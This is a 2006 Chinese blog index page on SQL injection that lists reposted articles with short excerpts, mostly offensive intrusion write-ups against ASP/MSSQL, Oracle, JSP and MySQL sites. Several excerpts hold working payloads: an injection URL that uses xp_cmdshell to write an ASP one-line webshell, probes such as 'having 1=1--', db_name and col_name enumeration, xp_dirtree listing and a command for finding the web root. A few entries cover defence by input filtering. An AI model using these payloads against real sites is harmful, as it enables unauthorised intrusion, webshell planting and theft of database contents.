
网络安全-注入专题
xdfwsl
真知困而得,峰高无坦途!
展开
-
一次对ASP+ORACLE的注入手记
一次对ASP+ORACLE的注入手记转载 2006-07-26 13:26:00 · 894 阅读 · 0 评论 -
当SA遇到XP_CMDSHELL时
有时候在入侵的时候总是碰到先烦恼的问题,比如SA遇到xp_cmdshell时,如果管理员把xp_cmdshell删了怎么办呢?总是眼看着肉鸡跑了吧!今天我就对XP_CMDSHELL做一先解释,希望大家能看明白,能看懂众所周知,在MSSQL中,通过XP_cmdshell存储扩展,拥护具有sysadmin权限,用来执行系统任意命令但是那先网管也不是吃素的,都回把它删除,所以在SQL Injection原创 2006-05-12 17:15:00 · 949 阅读 · 0 评论 -
SQL注入实战---利用“dbo”获得SQL管理权限和系统权限
SQL注入实战---利用“dbo”获得SQL管理权限和系统权限 作者:不详 来源于:不详 发布时间:2005-1-20 13:57:24 SQL注入实战---利用“dbo”获得SQL管理权限和系统权限 刚刚开始学习S转载 2006-05-11 23:50:00 · 1124 阅读 · 0 评论 -
关于web和sql分离--1个入侵的思考
转载 2006-05-16 03:15:00 · 734 阅读 · 0 评论 -
查看WEB绝对路径目录命令
查看WEB绝对路径目录命令 查看WEB网站安装目录命令: cscript c:/inetpub/adminscripts/adsutil.vbs enum w3svc/2/roo原创 2006-05-16 03:14:00 · 1989 阅读 · 0 评论 -
Advanced SQL Injection with MySQL
当得到PCANYWHERE密码之后当得到PCANYWHERE密码之后,此时我们用尽了各种方法,但不能得到我们想要的权限。。我给出我的一个成功的案例大家参考:目的:进入主机A条件:主机A用PCA远程管理,此时通过SHELL脚本得到了PCA的登录密码。只有一个PCA用户,管理员登录后我们就上不去,管理员离开后会把桌面锁定。我是这样做的:在主机A同一个网段上找到主机B做肉鸡。先让主机转载 2006-05-15 09:51:00 · 694 阅读 · 0 评论 -
手工注射JSP学习
1、 判断注入类型(数字型还是字符型)字符型和数字型数据判断:(希望有人能进一步的细化,细分为数字型和字符型判断两部分) And user>char(0) And userhttp://www.test.net/index_kaoyan_view.jsp?id=117 And user>char(0) And 1=1 And userchar(0) And %25= And us转载 2006-05-14 22:08:00 · 676 阅读 · 0 评论 -
记一次艰苦的入侵
记一次艰苦的入侵时间:2005-3-18 出处:网络 作者:未知 编辑:mervin【收藏到ViVi】【收藏到YouNote】【收藏此页到365Key】【 收藏此页到bbmao】 本文已在黑客防线05年第3期发表04年不平凡的一年,各种漏洞相转载 2006-05-12 18:09:00 · 1151 阅读 · 0 评论 -
如何找到SQL注入点
如何找到SQL注入点 作者:不详 来源于:不详 发布时间:2005-1-27 9:41:27 如何查找注入点!转载 2006-05-11 23:59:00 · 2161 阅读 · 0 评论 -
跨站式SQL注入技巧
跨站式SQL注入技巧 作者:不详 来源于:不详 发布时间:2005-1-20 14:17:28 跨站式SQL注入技巧前一阶段,在尝试攻击一个网站的时候,发现对方的系统已经屏蔽了错误信息,用的也是普通的帐号连接的数据库,系统也是打了全部的补丁这转载 2006-05-11 23:51:00 · 739 阅读 · 0 评论 -
Sql注射总结(强烈推荐)
Sql注射总结(早源于or1=1) 最重要的表名:select * from sysobjectssysobjects ncsysobjectssysindexes tsysindexessyscolumnssystypessysuserssysdatabasessysxloginssysprocesses最重要的一些用户名(默认sql数据库中存在着的)publicdbogue转载 2006-05-18 14:52:00 · 768 阅读 · 0 评论 -
关于SQL Server中几个未公布的访问注册表的扩展存储过程
SQL Server中包含了几个可以访问系统注册表的扩展存储过程.但实际上这几个扩展存储过程是未公开的,从sql server 7.0就有了, 在SQL server 2000中仍然保留,他们以后可能会删除.但是这几个存储过程却提供了在当前的SQL Server版本中访问系统注册表的能力, 而且很多人利用SQL Server来进行攻击系统时,往往都会用到这几个扩展存储过程.所以最转载 2006-05-15 09:45:00 · 667 阅读 · 0 评论 -
细说暴库的原理与方法
细说暴库的原理与方法 作者:不详 来源于:第八军团 发布时间:2005-3-29 14:06:05 SQL注入流行很久了,我们找漏洞注入目的无非是想得到数据库内的东西,比如用户名密码等。(当然mssql数据库还可以借此获得权限)。如果我们不用注入就可以得到整个数据库,不转载 2006-05-11 23:57:00 · 826 阅读 · 0 评论 -
ASP.NET防范SQL注入
好在要防止ASP.NET应用被SQL注入式攻击闯入并不是一件特别困难的事情,只要在利用表单输入的内容构造SQL命令之前,把所有输入内容过滤一番就可以了。过滤输入内容可以按多种方式进行。 ⑴ 对于动态构造SQL查询的场合,可以使用下面的技术: 第一:替换单引号,即把所有单独出现的单引号改成两个单引号,防止攻击者修改SQL命令的含义。再来看前面的例子,“SELECT * from Users转载 2006-05-14 09:18:00 · 789 阅读 · 0 评论 -
SQL注入中利用XP_cmdshell提权的用法
先来介绍一下子服务器的基本情况,windows 2000 adv server 中文版,据称打过了sp3,asp+iis+mssql 。首先扫描了一下子端口,呵呵,开始的一般步骤。端口21开放: FTP (Control)端口80开放: HTTP, World Wide Web端口135开放: Location Service端口139开放: NETBIOS Session Service端口14转载 2006-05-15 09:47:00 · 2703 阅读 · 0 评论 -
大四菜鸟的名牌大学入侵之旅
大四菜鸟的名牌大学入侵之旅|日期:2005-12-28 9:34:09 来源: 编辑: 浏览:30| >五一这几天在学校呆着没意思,老师:“学生么,在这个考验我们的时候可不能无所事是呀。充电…!”汗!于是,我把一年多来学的有关网络安全的知识总结了一下。然后就有了这次入侵检测!现在的黑客入侵和前几年的不一样了,从系统转载 2006-05-16 03:15:00 · 893 阅读 · 0 评论 -
一次对ASP+ORACLE的注入手记
转载 2006-07-26 13:20:00 · 838 阅读 · 0 评论 -
一个简单的oracle注入
<!--google_ad_client = "pub原创 2006-07-26 13:19:00 · 1097 阅读 · 0 评论 -
注入过程中遇到DB_OWNER的想法
注入过程中遇到DB_OWNER的想法现在注入横飞!工具一大堆,过去手工注入的时代已经不复存在!代之的是NBSI HDSI 啊D注入工具..等等.也是广大菜鸟的最爱了.即使什么也不会.什么也不懂.只需要点几下鼠标.存在注入漏洞的网站密码就出来了.接下来就是扫扫后台.传传马.就完了.就这样简单.碰到SA权限的话就.直接建立号开3389或者上传WEBSHELL.是内网就映射.是DB_转载 2006-05-31 11:40:00 · 914 阅读 · 0 评论 -
利用log备份获取WEBSHELL
利用log备份获取WEBSHELL 大 | 中 | 小 [ 2006/04/02 20:43 | by NetKnave ] 利用log备份获取WEBSHELL Blog被人渗透了一下,不知道各位掉了什么东西没有。原来有一次blog的目录可以列出来,那次我掉了一个小东西,然后今天别人告诉我NBSI 3用了那个东西的方法……呵呵,有点晕,就是下面的,成功率还是很高的,转载 2006-05-31 11:40:00 · 1153 阅读 · 0 评论 -
利用Google进行入侵的原理及防范
利用Google进行入侵的原理及防范 rising2005 发表于 2005-1-28 22:48:00 2004年在拉斯维加斯举行的BlackHat大会上,有两位安全专家分别作了名为You found t转载 2006-05-30 11:55:00 · 1062 阅读 · 0 评论 -
MSSQL db_owner角色注入直接获得系统权限- -
相信大家对ASP+MSSQL注入都已经很熟悉了,连一个对SQL语法丝毫不懂的人也可以用NBSI来轻松入侵大量网站。但就算是一个SQL INJECTION高手,如果针对在MSSQL中只有db_owner角色,破不出猜不到网站后台的情况下,好像也无技可施;除了用备份得到shell的这个思路,我在网上实在没有找出更好的入侵办法。不过,备份得到的shell只是理论化的东东,如果一个webshell有20m转载 2006-05-23 00:13:00 · 876 阅读 · 0 评论 -
sql injection终极利用方法
标题:sql injection终极利用方法 xwq转载 2006-05-23 00:06:00 · 825 阅读 · 0 评论 -
SQL注入傻瓜工具大比拼
前言 随着ASP的日趋成熟,各种检测工具也逐渐流行了起来。如今,几乎每一个学习黑客的网迷手里都有一款或几款得心应手的注入工具。但我通过QQ群了解到,有相当一大部分人认为这些工具的注入手法是相同或相近的。其实这种说法只说对了一部分,在提交“and 1=1”、“and 1=2”进行漏洞判断时,这些软件所使用的方式的确是一样的,但接下来在猜解表名、猜解列名、猜解记录上,各软件所用的方式方法却不尽相同。转载 2006-05-21 10:31:00 · 1771 阅读 · 0 评论 -
取代NBSI2:Opendatasource And Openrowset
作者:lcx 文章来源:黑客防线目前市面上的SQL Injection工具很多,最受推崇的当属NBSI2了。SQL Injection的方法在网上也是满天飞,大家认真学一下都会很快成为脚本入侵“高手”。可是无论是工具,还是众多方法,猜SQL数据的时候原理不外乎两种:一个是对方的WEB服务器在没有关闭错误提示的时候原创 2006-05-21 10:23:00 · 1071 阅读 · 0 评论 -
asp.net防注入的两个自定义函数
一.如果参数全转载 2006-05-24 14:20:00 · 1117 阅读 · 0 评论 -
我是怎么利用纯脚本技术,拿到系统管理员权限的
时间:2005-01-10 来源:不详 这绝对是一篇非常有观看价值的文章.有我对脚本注入漏洞的深入了解,对入侵的新思维分析.目前网上到处流转载 2006-05-24 14:17:00 · 1586 阅读 · 0 评论 -
public和db_owner权限拿到webshell
在看之前我们先回顾一下目前在公开或者已知的public和db_owner权限拿到webshell或者系统权限的思路和方法(sysadmin权限我就不说拉,给你这么一句,只要是sysadmin,拿不到webshell或者系统权限那是你的无能)public下面我还没见到一种可以真正能利用的方法。db_owner目前公开的方法主要有5种:第一种就是最普遍的backup,现在利用差异备份生成的asp文件确原创 2006-05-23 00:07:00 · 1521 阅读 · 0 评论 -
sql injection 终极利用方法
呵``对于黑站``本人`也常使用到这个办法`没想到`给写的这么系统出来了``别问什么是技术``这就是技术了```` ` sql injection终极利用方法 ————只要给我一个注射点,无论什么权限,我都给你一个webshell甚至系统权限 原创:许文强(xwq),QQ:57133683 声明:本文仅用于教学目的,如果因为本文造成的攻击后果本人概不负责。因为 发觉其危害过大,原文已经经过大量删减转载 2006-05-23 00:03:00 · 1193 阅读 · 0 评论 -
数据库备份篇
动网论坛7.0自从发布以来进一步扩大了其在asp论坛领域的声誉和好评,无论是在美工、性能、安全性和效率上都比上一个版本有了很大的进步。在读代码的时候给我的唯一感觉就是——美。但是世上没有不透风的墙啊,代码写得再严谨也是会有疏忽的时候。为了找出它的漏洞,我就像是大海捞针一样在茫茫的代码中寻觅,蓦然回首那人却在灯火阑珊处。请跟着我来看一看吧。第一篇 发现新大陆CODE 打开AccessTopic.a转载 2006-05-15 21:56:00 · 642 阅读 · 0 评论 -
浅谈MYSQL跨库查询
不知道大家有没有碰到这种情况,想获取一个固若金汤的PHP+MYSQL论坛的敏感信息,怎么办?社会工程学?从主机下手?其实大家大可不必如此消极,按照我们web安全爱好者的习惯,再浏览看看站点上的其他资源,如果有其他PHP+MYSQL系统有漏洞,那我们完全可以利用有漏洞的系统注入那个固若金汤的系统,就和从同一网段的脆弱主机入手一个道理,只是这个简单多了。 其实在这篇文章中,我可以告诉大家,PHP转载 2006-05-15 09:50:00 · 1099 阅读 · 0 评论 -
SQL注入天书之ASP注入漏洞全接触
引 言 随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。 SQL注入是从正常的转载 2006-05-04 18:53:00 · 633 阅读 · 0 评论 -
SQL注入攻击常见方法和技巧
知己知披 方能百战百胜;“黑客”们采用的攻击方法雷同,下面是我挑选的一些具有代表性的攻击方法,分析这些方法有助于程序员们编写更少漏洞的程序。跨站式SQL注入数据库攻击和防范技巧前一阶段,在尝试攻击一个网站的时候,发现对方的系统已经屏蔽了错误信息,用的也是普通的帐号连接的数据库,系统也是打了全部的补丁这样要攻击注入是比较麻烦的。因此我自己搞了一种“跨站式SQL注入”。 思路如下,既然你不显示错误转载 2006-05-04 14:13:00 · 992 阅读 · 0 评论 -
最详细的SQL注入相关的命令整理
QUOTE:1、 用^转义字符来写ASP(一句话木马)文件的方法: http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell echo ^execute request^("l"^)^ >c:/mu.asp;-- echo ^ >c:/mu.asp2、 显示SQL系统版本: 原创 2006-05-04 10:17:00 · 2814 阅读 · 0 评论 -
SQL防注入简介
SQL注入简介 许多网站程序在编写时,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码, (一般是在浏览器地址栏进行,通过正常的www端口访问) 根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。SQL注入思路 思路最重要,其实好多人都不知道SQL到底能做什么呢!这里总结一下SQL注入入侵的总体的思路 1转载 2006-05-04 10:12:00 · 743 阅读 · 0 评论 -
构造特殊字符来进行渗透入侵
lcx 分析服务器的web程序,像论坛、聊天室了,发现其程序编写的bug或疏漏,从而进行80端口的渗透入侵,似乎只是黑客程序高手的事情。其实不然,虽然我们不会编写程序,但是利用构造特殊字符菜鸟一样可以来进行80端口的渗透入侵。不相信?那好,看我用特殊字符精心打造的的四把小李飞刀。 第一把飞刀:鱼目混珠。我们可以用它实现在论坛里冒名发言转载 2006-05-06 17:01:00 · 936 阅读 · 0 评论 -
SQL 注入有常用语句
是否支持多句查询http://www.xxx.com/xxxnews/shownews.asp?id=51;declare @a int-- 是否支持子查询http://www.xxx.com/xxxnews/shownews.asp?id=51 and (Select count(1) from [sysobjects])>=0返回用户名http://www.xxx.com/原创 2006-05-04 22:07:00 · 948 阅读 · 0 评论 -
注入经验积累
注入经验积累(一)目标:http://www.abcw114.com/index.asp注入点:会员登陆(帐号/密码)一、获得建立用户的表的名字和字段的名字;使用select语法的having子句。**********************************************************************************having 1=1--原创 2006-05-04 22:06:00 · 827 阅读 · 0 评论 -
SQL注入时快速获得WEB根目录
本文章针对以下环境,如果不符合以下的条件,就不适合用下面提到的方法来获得WEB根目录。 1、SQL SERVER允许执行多行语句; 2、该网站能进行注入; 3、没有返回详细的错误提示信息(否则没有必要用这种方法)。 根据经验,猜疑WEB根目录的顺序是:d盘、e盘、c盘,首先我们建立一个临时表用于存放master..xp_dirtree(适合于public)生成的目录树,用以下语句: ;create原创 2006-05-04 21:15:00 · 3607 阅读 · 0 评论 -
注入的几条简单语句,不用像网上那样复杂
一、版本url/1.asp?id=1 and @@VERSION>0二、跨库url/1.asp?id=1 and 1=(select db_name(n))n改成0,1,2,3……就可以跨库了,是不是比网上的简单呢?三、列名url/1.asp?id=1 and 1=(select col_name(object_id(表名),n) 表名可以换成16进制。像bbsuser=0x6200620原创 2006-05-04 21:11:00 · 756 阅读 · 0 评论